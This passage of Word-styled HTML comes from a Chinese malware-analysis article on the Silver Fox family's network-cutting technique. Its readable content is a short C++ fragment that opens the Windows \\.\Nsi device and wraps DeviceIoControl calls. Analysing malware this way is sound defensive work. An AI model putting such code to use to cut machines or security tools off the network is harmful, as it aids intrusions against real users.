leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">HANDLE h </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> CreateFileW</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\\\\</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\\</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Nsi&#34;, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0, FILE_SHARE_READ </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">|</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> FILE_SHARE_WRITE, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">h </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> INVALID_HANDLE_VALUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> GetLastError</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">();</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">InterlockedCompareExchangePointer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">hDevice, h, INVALID_HANDLE_VALUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">!=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> INVALID_HANDLE_VALUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">CloseHandle</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">h</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">lpOverlapped</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DeviceIoControl</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">hDevice, dwIoControlCode, lpInBuffer, nInBufferSize,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">lpOutBuffer, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">lpBytesReturned, lpBytesReturned, lpOverlapped</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">))</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> GetLastError</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">();</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">HANDLE hEvent </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> CreateEvent</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span 